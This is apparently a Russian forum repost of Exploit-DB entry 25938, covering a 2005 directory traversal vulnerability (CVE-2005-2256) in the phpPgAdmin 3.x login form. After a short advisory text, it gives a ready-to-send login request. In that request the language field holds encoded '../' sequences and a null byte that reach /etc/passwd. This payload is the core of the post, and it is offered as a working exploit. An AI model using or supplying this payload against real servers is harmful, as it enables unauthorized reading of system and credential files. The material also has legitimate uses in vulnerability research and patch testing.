Exploit phpPgAdmin 3.x - Login Form Directory Traversal

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
25938
Проверка EDB
  1. Пройдено
Автор
RZNVYNQQE@HUSHMAIL.COM
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2005-2256
Дата публикации
2005-07-05
Код:
source: https://www.securityfocus.com/bid/14142/info

phpPgAdmin is prone to a directory traversal vulnerability. The application fails to filter directory traversal sequences from requests to the login form.

All versions of phpPgAdmin are considered to be vulnerable at the moment. 

formUsername=username&formPassword=password&formServer=0&formLanguag
e=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/et
c/passwd%00&submitLogin=Login
 
Источник
www.exploit-db.com

Похожие темы